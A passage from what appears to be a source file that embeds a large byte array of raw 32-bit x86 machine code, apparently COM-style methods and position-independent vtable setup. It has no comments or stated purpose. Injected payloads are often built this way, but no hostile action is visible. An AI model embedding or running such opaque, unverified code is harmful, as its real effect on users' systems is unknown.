1415 0x10, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x89,
1416 0x14, 0x24, 0xe8, 0x68, 0x12, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x27, 0x8b,
1417 0x45, 0xf4, 0x8b, 0x40, 0x2c, 0x8d, 0x90, 0xb4, 0x08, 0x00, 0x00, 0xc7,
1418 0x44, 0x24, 0x08, 0x10, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44,
1419 0x24, 0x04, 0x89, 0x14, 0x24, 0xe8, 0x41, 0x12, 0x00, 0x00, 0x85, 0xc0,
1420 0x75, 0x1d, 0x8b, 0x45, 0x10, 0x8b, 0x55, 0x08, 0x89, 0x10, 0x8b, 0x45,
1421 0x08, 0x89, 0x04, 0x24, 0xe8, 0x66, 0x00, 0x00, 0x00, 0x83, 0xec, 0x04,
1422 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x58, 0x8b, 0x45, 0xf4, 0x8b, 0x40,
1423 0x2c, 0x8d, 0x90, 0xc4, 0x08, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x10,
1424 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x89, 0x14,
1425 0x24, 0xe8, 0xfd, 0x11, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x23, 0x8b, 0x45,
1426 0xf4, 0x8d, 0x50, 0x08, 0x8b, 0x45, 0x10, 0x89, 0x10, 0x8b, 0x45, 0xf4,
1427 0x83, 0xc0, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x23, 0x03, 0x00, 0x00, 0x83,
1428 0xec, 0x04, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x0e, 0x8b, 0x45, 0x10,
1429 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0xc9,
1430 0xc2, 0x0c, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x10, 0x8b, 0x45, 0x08,
1431 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x83, 0xc0, 0x04, 0x89, 0x45, 0xf8,
1432 0x8b, 0x45, 0xf8, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f, 0xc1, 0x10,
1433 0x8b, 0x45, 0xfc, 0x8b, 0x40, 0x04, 0xc9, 0xc2, 0x04, 0x00, 0x55, 0x89,
1434 0xe5, 0x83, 0xec, 0x10, 0x8b, 0x45, 0x08, 0x89, 0x45, 0xfc, 0x8b, 0x45,
1435 0xfc, 0x83, 0xc0, 0x04, 0x89, 0x45, 0xf4, 0x8b, 0x55, 0xf4, 0xb8, 0x01,
1436 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1,
1437 0x02, 0x01, 0xc8, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0xf8, 0xc9, 0xc2, 0x04,
1438 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x28, 0x8b, 0x45, 0x08, 0x89, 0x45,
1439 0xf4, 0x8b, 0x45, 0x10, 0x83, 0xe0, 0x02, 0x85, 0xc0, 0x74, 0x31, 0x83,
1440 0x7d, 0x18, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x62,
1441 0x8b, 0x45, 0xf4, 0x8b, 0x40, 0x1c, 0x8b, 0x00, 0x8b, 0x40, 0x04, 0x8b,
1442 0x55, 0xf4, 0x8b, 0x52, 0x1c, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec,
1443 0x04, 0x8b, 0x45, 0xf4, 0x8b, 0x50, 0x1c, 0x8b, 0x45, 0x18, 0x89, 0x10,
1444 0x8b, 0x45, 0x10, 0x83, 0xe0, 0x01, 0x85, 0xc0, 0x74, 0x2f, 0x83, 0x7d,
1445 0x14, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x27, 0x8b,
1446 0x45, 0xf4, 0x8b, 0x40, 0x14, 0x8b, 0x40, 0x04, 0x8b, 0x55, 0xf4, 0x83,
1447 0xc2, 0x14, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b, 0x45,
1448 0xf4, 0x8d, 0x50, 0x14, 0x8b, 0x45, 0x14, 0x89, 0x10, 0xb8, 0x00, 0x00,
1449 0x00, 0x00, 0xc9, 0xc2, 0x14, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x48,
1450 0xc7, 0x45, 0xd0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xcc, 0x00, 0x00,
1451 0x00, 0x00, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
1452 0x08, 0x20, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00,
1453 0x00, 0x8d, 0x45, 0xd4, 0x89, 0x04, 0x24, 0xe8, 0x40, 0x10, 0x00, 0x00,
1454 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x8b, 0x40, 0x0c, 0x8d, 0x55, 0xd4, 0x89,
1455 0x54, 0x24, 0x04, 0x8b, 0x55, 0x0c, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
1456 0xec, 0x08, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x75, 0x2b, 0x8b,
1457 0x45, 0x0c, 0x8b, 0x00, 0x8b, 0x40, 0x10, 0x8d, 0x55, 0xc8, 0x89, 0x54,
1458 0x24, 0x0c, 0x8d, 0x55, 0xcc, 0x89, 0x54, 0x24, 0x08, 0x8d, 0x55, 0xd0,
1459 0x89, 0x54, 0x24, 0x04, 0x8b, 0x55, 0x0c, 0x89, 0x14, 0x24, 0xff, 0xd0,
1460 0x83, 0xec, 0x10, 0x89, 0x45, 0xf4, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xc9,
1461 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x18, 0x8b, 0x45, 0x08,
1462 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x8b, 0x40, 0x2c, 0x8b, 0x40, 0x4c,
1463 0xff, 0xd0, 0x8b, 0x55, 0x0c, 0x89, 0x02, 0xb8, 0x00, 0x00, 0x00, 0x00,
1464 0xc9, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x00, 0x00, 0x00, 0x00,
1465 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x00, 0x00, 0x00, 0x00,
1466 0x5d, 0xc2, 0x0c, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x00, 0x00, 0x00, 0x00,
1467 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x00, 0x00, 0x00, 0x00,
1468 0x5d, 0xc2, 0x04, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x00, 0x00, 0x00, 0x00,
1469 0x5d, 0xc2, 0x04, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x08, 0xe8, 0x65,
1470 0x0c, 0x00, 0x00, 0xba, 0x46, 0x55, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40,
1471 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x10,
1472 0xe8, 0x4b, 0x0c, 0x00, 0x00, 0xba, 0xd6, 0x55, 0x40, 0x00, 0xb9, 0x14,
1473 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00,
1474 0x89, 0x50, 0x04, 0xe8, 0x30, 0x0c, 0x00, 0x00, 0xba, 0xfb, 0x55, 0x40,
1475 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45,
1476 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x08, 0xe8, 0x15, 0x0c, 0x00, 0x00, 0xba,
1477 0x28, 0x56, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01,
1478 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x0c, 0xe8, 0xfa, 0x0b,
1479 0x00, 0x00, 0xba, 0x34, 0x56, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00,
1480 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x10,
1481 0x8b, 0x45, 0x0c, 0xc7, 0x40, 0x04, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
1482 0x0c, 0x8b, 0x55, 0x08, 0x89, 0x50, 0x08, 0x90, 0xc9, 0xc3, 0x55, 0x89,
1483 0xe5, 0x83, 0xec, 0x18, 0x83, 0x7d, 0x10, 0x00, 0x75, 0x07, 0xb8, 0x03,
1484 0x40, 0x00, 0x80, 0xeb, 0x79, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x08, 0x8d,
1485 0x90, 0x04, 0x08, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x10, 0x00, 0x00,
1486 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x89, 0x14, 0x24, 0xe8,
1487 0x17, 0x0f, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x27, 0x8b, 0x45, 0x08, 0x8b,
1488 0x40, 0x08, 0x8d, 0x90, 0xc4, 0x08, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08,
1489 0x10, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x89,
1490 0x14, 0x24, 0xe8, 0xf0, 0x0e, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x1d, 0x8b,
1491 0x45, 0x10, 0x8b, 0x55, 0x08, 0x89, 0x10, 0x8b, 0x45, 0x08, 0x89, 0x04,
1492 0x24, 0xe8, 0x1c, 0x00, 0x00, 0x00, 0x83, 0xec, 0x04, 0xb8, 0x00, 0x00,
1493 0x00, 0x00, 0xeb, 0x0e, 0x8b, 0x45, 0x10, 0xc7, 0x00, 0x00, 0x00, 0x00,
1494 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0xc9, 0xc2, 0x0c, 0x00, 0x55, 0x89,
1495 0xe5, 0x83, 0xec, 0x10, 0x8b, 0x45, 0x08, 0x83, 0xc0, 0x04, 0x89, 0x45,
1496 0xfc, 0x8b, 0x45, 0xfc, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f, 0xc1,
1497 0x10, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x04, 0xc9, 0xc2, 0x04, 0x00, 0x55,
1498 0x89, 0xe5, 0x83, 0xec, 0x10, 0x8b, 0x45, 0x08, 0x83, 0xc0, 0x04, 0x89,
1499 0x45, 0xf8, 0x8b, 0x55, 0xf8, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xf7, 0xd8,
1500 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02, 0x01, 0xc8, 0x89, 0x45,
1501 0xfc, 0x8b, 0x45, 0xfc, 0xc9, 0xc2, 0x04, 0x00, 0x55, 0x89, 0xe5, 0xb8,
1502 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8,
1503 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0x53,
1504 0x81, 0xec, 0x24, 0x02, 0x00, 0x00, 0xe8, 0xc5, 0x0a, 0x00, 0x00, 0xba,
1505 0x0d, 0x5a, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01,
1506 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x10, 0xe8, 0xab, 0x0a, 0x00,
1507 0x00, 0xba, 0xb9, 0x5a, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1508 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x04, 0xe8,
1509 0x90, 0x0a, 0x00, 0x00, 0xba, 0xde, 0x5a, 0x40, 0x00, 0xb9, 0x14, 0x61,
1510 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1511 0x50, 0x08, 0xe8, 0x75, 0x0a, 0x00, 0x00, 0xba, 0x0b, 0x5b, 0x40, 0x00,
1512 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1513 0x8b, 0x00, 0x89, 0x50, 0x0c, 0xe8, 0x5a, 0x0a, 0x00, 0x00, 0xba, 0x2d,
1514 0x5b, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1515 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x10, 0xe8, 0x3f, 0x0a, 0x00,
1516 0x00, 0xba, 0x6d, 0x5b, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1517 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x14, 0xe8,
1518 0x24, 0x0a, 0x00, 0x00, 0xba, 0xa5, 0x5b, 0x40, 0x00, 0xb9, 0x14, 0x61,
1519 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1520 0x50, 0x18, 0xe8, 0x09, 0x0a, 0x00, 0x00, 0xba, 0x0b, 0x5c, 0x40, 0x00,
1521 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1522 0x8b, 0x00, 0x89, 0x50, 0x1c, 0xe8, 0xee, 0x09, 0x00, 0x00, 0xba, 0x17,
1523 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1524 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x20, 0xe8, 0xd3, 0x09, 0x00,
1525 0x00, 0xba, 0x23, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1526 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x24, 0xe8,
1527 0xb8, 0x09, 0x00, 0x00, 0xba, 0x2f, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61,
1528 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1529 0x50, 0x28, 0xe8, 0x9d, 0x09, 0x00, 0x00, 0xba, 0x3b, 0x5c, 0x40, 0x00,
1530 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1531 0x8b, 0x00, 0x89, 0x50, 0x2c, 0xe8, 0x82, 0x09, 0x00, 0x00, 0xba, 0x47,
1532 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1533 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x30, 0xe8, 0x67, 0x09, 0x00,
1534 0x00, 0xba, 0x5d, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1535 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x34, 0xe8,
1536 0x4c, 0x09, 0x00, 0x00, 0xba, 0x9d, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61,
1537 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1538 0x50, 0x38, 0xe8, 0x31, 0x09, 0x00, 0x00, 0xba, 0xa9, 0x5c, 0x40, 0x00,
1539 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1540 0x8b, 0x00, 0x89, 0x50, 0x3c, 0xe8, 0x16, 0x09, 0x00, 0x00, 0xba, 0xb5,
1541 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1542 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x40, 0xe8, 0xfb, 0x08, 0x00,
1543 0x00, 0xba, 0xc1, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1544 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x44, 0xe8,
1545 0xe0, 0x08, 0x00, 0x00, 0xba, 0xcd, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61,
1546 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1547 0x50, 0x48, 0xe8, 0xc5, 0x08, 0x00, 0x00, 0xba, 0xd9, 0x5c, 0x40, 0x00,
1548 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1549 0x8b, 0x00, 0x89, 0x50, 0x4c, 0xe8, 0xaa, 0x08, 0x00, 0x00, 0xba, 0xe5,
1550 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1551 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x50, 0xe8, 0x8f, 0x08, 0x00,
1552 0x00, 0xba, 0xf1, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1553 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x54, 0xe8,
1554 0x74, 0x08, 0x00, 0x00, 0xba, 0xfd, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61,
1555 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1556 0x50, 0x58, 0xe8, 0x59, 0x08, 0x00, 0x00, 0xba, 0x09, 0x5d, 0x40, 0x00,
1557 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1558 0x8b, 0x00, 0x89, 0x50, 0x5c, 0xe8, 0x3e, 0x08, 0x00, 0x00, 0xba, 0x15,
1559 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1560 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x60, 0xe8, 0x23, 0x08, 0x00,
1561 0x00, 0xba, 0x21, 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1562 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x64, 0xe8,
1563 0x08, 0x08, 0x00, 0x00, 0xba, 0x44, 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61,
1564 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1565 0x50, 0x68, 0xe8, 0xed, 0x07, 0x00, 0x00, 0xba, 0x50, 0x5d, 0x40, 0x00,
1566 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1567 0x8b, 0x00, 0x89, 0x50, 0x6c, 0xe8, 0xd2, 0x07, 0x00, 0x00, 0xba, 0x5c,
1568 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1569 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x70, 0xe8, 0xb7, 0x07, 0x00,
1570 0x00, 0xba, 0x68, 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1571 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x74, 0x8b,
1572 0x45, 0x0c, 0xc7, 0x40, 0x10, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c,
1573 0x8b, 0x55, 0x08, 0x89, 0x50, 0x14, 0x8b, 0x45, 0x08, 0x8d, 0x90, 0xed,
1574 0x05, 0x00, 0x00, 0x8d, 0x85, 0xf2, 0xfd, 0xff, 0xff, 0x89, 0x44, 0x24,
1575 0x08, 0x89, 0x54, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8,
1576 0x73, 0xc0, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xa4, 0x00, 0x00,
1577 0x00, 0x8b, 0x55, 0x0c, 0x83, 0xc2, 0x04, 0x89, 0x54, 0x24, 0x04, 0x8d,
1578 0x95, 0xf2, 0xfd, 0xff, 0xff, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec,
1579 0x08, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x75, 0x33, 0x8b, 0x45,
1580 0x0c, 0x8b, 0x40, 0x04, 0x8b, 0x00, 0x8b, 0x40, 0x18, 0x8b, 0x55, 0x0c,
1581 0x8d, 0x5a, 0x08, 0x8b, 0x55, 0x08, 0x8d, 0x8a, 0x94, 0x08, 0x00, 0x00,
1582 0x8b, 0x55, 0x0c, 0x8b, 0x52, 0x04, 0x89, 0x5c, 0x24, 0x08, 0x89, 0x4c,
1583 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45,
1584 0xf4, 0x8b, 0x45, 0xf4, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89, 0xe5,
1585 0x83, 0xec, 0x18, 0x83, 0x7d, 0x10, 0x00, 0x75, 0x0a, 0xb8, 0x03, 0x40,
1586 0x00, 0x80, 0xe9, 0x92, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x40,
1587 0x14, 0x8d, 0x90, 0x04, 0x08, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x10,
1588 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x89, 0x14,
1589 0x24, 0xe8, 0x4d, 0x0a, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x4e, 0x8b, 0x45,
1590 0x08, 0x8b, 0x40, 0x14, 0x8d, 0x90, 0x14, 0x08, 0x00, 0x00, 0xc7, 0x44,
1591 0x24, 0x08, 0x10, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24,
1592 0x04, 0x89, 0x14, 0x24, 0xe8, 0x26, 0x0a, 0x00, 0x00, 0x85, 0xc0, 0x74,
1593 0x27, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x14, 0x8d, 0x90, 0x94, 0x08, 0x00,
1594 0x00, 0xc7, 0x44, 0x24, 0x08, 0x10, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c,
1595 0x89, 0x44, 0x24, 0x04, 0x89, 0x14, 0x24, 0xe8, 0xff, 0x09, 0x00, 0x00,
1596 0x85, 0xc0, 0x75, 0x0f, 0x8b, 0x45, 0x10, 0x8b, 0x55, 0x08, 0x89, 0x10,
1597 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x0e, 0x8b, 0x45, 0x10, 0xc7, 0x00,
1598 0x00, 0x00, 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0xc9, 0xc2, 0x0c,
1599 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x10, 0x8b, 0x45, 0x08, 0x83, 0xc0,
1600 0x10, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0xba, 0x01, 0x00, 0x00, 0x00,
1601 0xf0, 0x0f, 0xc1, 0x10, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x10, 0xc9, 0xc2,
1602 0x04, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x10, 0x8b, 0x45, 0x08, 0x83,
1603 0xc0, 0x10, 0x89, 0x45, 0xf8, 0x8b, 0x55, 0xf8, 0xb8, 0x01, 0x00, 0x00,
1604 0x00, 0xf7, 0xd8, 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02, 0x01,
1605 0xc8, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0xc9, 0xc2, 0x04, 0x00, 0x55,
1606 0x89, 0xe5, 0x83, 0x7d, 0x0c, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00,
1607 0x80, 0xeb, 0x0e, 0x8b, 0x45, 0x0c, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00,
1608 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5,
1609 0x83, 0xec, 0x18, 0x83, 0x7d, 0x14, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40,
1610 0x00, 0x80, 0xeb, 0x29, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x08, 0x8b, 0x00,
1611 0x8b, 0x40, 0x04, 0x8b, 0x55, 0x08, 0x8b, 0x52, 0x08, 0x89, 0x14, 0x24,
1612 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x08, 0x8b,
1613 0x45, 0x14, 0x89, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xc9, 0xc2, 0x10,
1614 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x18, 0x8b, 0x45, 0x08, 0x8b, 0x40,
1615 0x08, 0x8b, 0x00, 0x8b, 0x40, 0x28, 0x8b, 0x55, 0x08, 0x8b, 0x52, 0x08,
1616 0x8b, 0x4d, 0x1c, 0x89, 0x4c, 0x24, 0x0c, 0x8b, 0x4d, 0x14, 0x89, 0x4c,
1617 0x24, 0x08, 0x8b, 0x4d, 0x10, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24,
1618 0xff, 0xd0, 0x83, 0xec, 0x10, 0xc9, 0xc2, 0x18, 0x00, 0x55, 0x89, 0xe5,
1619 0x53, 0x83, 0xec, 0x44, 0x8b, 0x45, 0x18, 0x66, 0x89, 0x45, 0xe4, 0x8b,
1620 0x45, 0x08, 0x8b, 0x40, 0x08, 0x8b, 0x00, 0x8b, 0x40, 0x2c, 0x0f, 0xb7,
1621 0x4d, 0xe4, 0x8b, 0x55, 0x08, 0x8b, 0x52, 0x08, 0x8b, 0x5d, 0x28, 0x89,
1622 0x5c, 0x24, 0x1c, 0x8b, 0x5d, 0x24, 0x89, 0x5c, 0x24, 0x18, 0x8b, 0x5d,
1623 0x20, 0x89, 0x5c, 0x24, 0x14, 0x8b, 0x5d, 0x1c, 0x89, 0x5c, 0x24, 0x10,
1624 0x89, 0x4c, 0x24, 0x0c, 0x8b, 0x4d, 0x0c, 0x89, 0x4c, 0x24, 0x08, 0x8b,
1625 0x4d, 0x08, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
1626 0xec, 0x20, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x8b, 0x5d, 0xfc, 0xc9,
1627 0xc2, 0x24, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d,
1628 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1629 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1630 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1631 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1632 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x04, 0x8b, 0x45, 0x0c,
1633 0x66, 0x89, 0x45, 0xfc, 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc9, 0xc2, 0x08,
1634 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x18, 0x8b, 0x45, 0x08, 0x8b, 0x40,
1635 0x0c, 0x8b, 0x00, 0x8b, 0x40, 0x38, 0x8b, 0x55, 0x08, 0x8b, 0x52, 0x0c,
1636 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08,
1637 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0xfd, 0xff, 0xff, 0xff,
1638 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0xb8, 0x00, 0x00, 0x00,
